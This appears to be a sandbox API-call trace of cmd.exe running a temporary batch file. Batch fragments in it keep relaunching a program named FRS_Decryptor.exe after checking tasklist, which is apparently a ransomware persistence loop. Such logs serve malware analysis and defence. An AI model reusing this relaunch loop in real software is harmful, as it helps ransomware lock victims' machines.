[0083.770] GetConsoleOutputCP () returned 0x1b5 [0083.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0083.770] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.771] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0083.771] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0083.771] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.771] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0083.771] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0083.771] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0083.771] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0083.771] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0083.771] GetFileType (hFile=0x2a0) returned 0x1 [0083.771] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0083.771] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0083.771] _tell (_FileHandle=3) returned 2512 [0083.771] _close (_FileHandle=3) returned 0 [0083.771] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0083.771] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0083.771] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0083.771] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0083.771] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0083.771] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0083.771] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0083.771] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0083.771] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0083.771] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0083.771] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0083.771] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0083.771] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0083.772] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0083.772] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0083.772] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0083.772] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0083.772] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0083.772] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0083.772] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0083.772] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0083.772] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0083.772] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0083.772] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0083.772] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0083.772] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0083.772] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0083.772] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0083.772] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0083.772] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0083.772] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0083.772] _wcsicmp (_String1="ping", _String2="START") returned -3 [0083.772] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0083.772] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0083.772] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0083.772] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0083.772] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0083.772] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0083.772] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0083.772] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0083.772] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0083.772] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0083.772] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0083.772] SetErrorMode (uMode=0x0) returned 0x0 [0083.772] SetErrorMode (uMode=0x1) returned 0x0 [0083.772] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0083.772] SetErrorMode (uMode=0x0) returned 0x1 [0083.772] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.772] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.772] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.772] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.772] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0083.773] GetLastError () returned 0x2 [0083.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.773] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0083.773] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0083.773] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0083.773] GetLastError () returned 0x2 [0083.773] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0083.773] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0083.773] GetFileType (hFile=0x28) returned 0x2 [0083.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0083.773] _dup (_FileHandle=1) returned 3 [0083.773] _close (_FileHandle=1) returned 0 [0083.773] _wcsicmp (_String1="nul", _String2="con") returned 11 [0083.773] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0083.773] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0083.773] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0083.774] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0083.774] SetErrorMode (uMode=0x0) returned 0x0 [0083.774] SetErrorMode (uMode=0x1) returned 0x0 [0083.774] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0083.774] SetErrorMode (uMode=0x0) returned 0x1 [0083.774] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0083.774] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.774] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.774] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.774] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0083.774] GetLastError () returned 0x2 [0083.774] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.774] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59e70 [0083.774] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0083.774] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0083.774] GetLastError () returned 0x2 [0083.774] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a170 [0083.775] FindClose (in: hFindFile=0xd5a170 | out: hFindFile=0xd5a170) returned 1 [0083.775] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0083.775] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0083.775] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0083.775] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0083.776] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0083.776] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0083.776] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x2f0, dwProcessId=0xb44, dwThreadId=0x6a8)) returned 1 [0083.779] CloseHandle (hObject=0x2f0) returned 1 [0083.779] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0083.779] GetEnvironmentStringsW () returned 0xd30508* [0083.779] FreeEnvironmentStringsA (penv="=") returned 1 [0083.779] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0085.840] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0085.840] CloseHandle (hObject=0x260) returned 1 [0085.840] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0085.840] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0085.840] GetEnvironmentStringsW () returned 0xd2c668* [0085.840] FreeEnvironmentStringsA (penv="=") returned 1 [0085.840] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0085.840] GetEnvironmentStringsW () returned 0xd30508* [0085.840] FreeEnvironmentStringsA (penv="=") returned 1 [0085.840] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0085.840] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0085.840] _close (_FileHandle=3) returned 0 [0085.840] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.840] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0085.841] _get_osfhandle (_FileHandle=1) returned 0x28 [0085.841] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0085.841] _get_osfhandle (_FileHandle=0) returned 0x24 [0085.841] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0085.841] SetConsoleInputExeNameW () returned 0x1 [0085.841] GetConsoleOutputCP () returned 0x1b5 [0085.841] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0085.841] SetThreadUILanguage (LangId=0x0) returned 0x409 [0085.841] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0085.841] _open_osfhandle (_OSFileHandle=0x2a0, _Flags=8) returned 3 [0085.842] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0085.842] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0085.842] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0085.842] GetFileType (hFile=0x2a0) returned 0x1 [0085.842] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0085.842] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0085.842] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0085.842] GetFileType (hFile=0x2a0) returned 0x1 [0085.842] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0085.842] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0085.843] _tell (_FileHandle=3) returned 2627 [0085.843] _close (_FileHandle=3) returned 0 [0085.843] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0085.843] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0085.843] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0085.843] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0085.843] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0085.847] feof (_File=0x76ea4c68) returned 0 [0085.847] ferror (_File=0x76ea4c68) returned 0 [0085.847] fgets (in: _Buf=0xd82fd8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0086.303] feof (_File=0x76ea4c68) returned 0 [0086.303] ferror (_File=0x76ea4c68) returned 0 [0086.303] fgets (in: _Buf=0xd85486, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0086.340] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0086.341] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43306, cbMultiByte=78, lpWideCharStr=0xd432b8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0086.341] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0086.341] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0086.342] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0086.342] _open_osfhandle (_OSFileHandle=0x254, _Flags=8) returned 3 [0086.342] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0086.342] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.342] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0086.342] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0086.342] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0086.342] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.342] GetFileType (hFile=0x254) returned 0x1 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0086.342] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0086.342] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0086.342] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.342] GetFileType (hFile=0x254) returned 0x1 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0086.342] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0086.342] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0086.342] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.342] GetFileType (hFile=0x254) returned 0x1 [0086.342] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0086.342] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0086.343] SetFilePointer 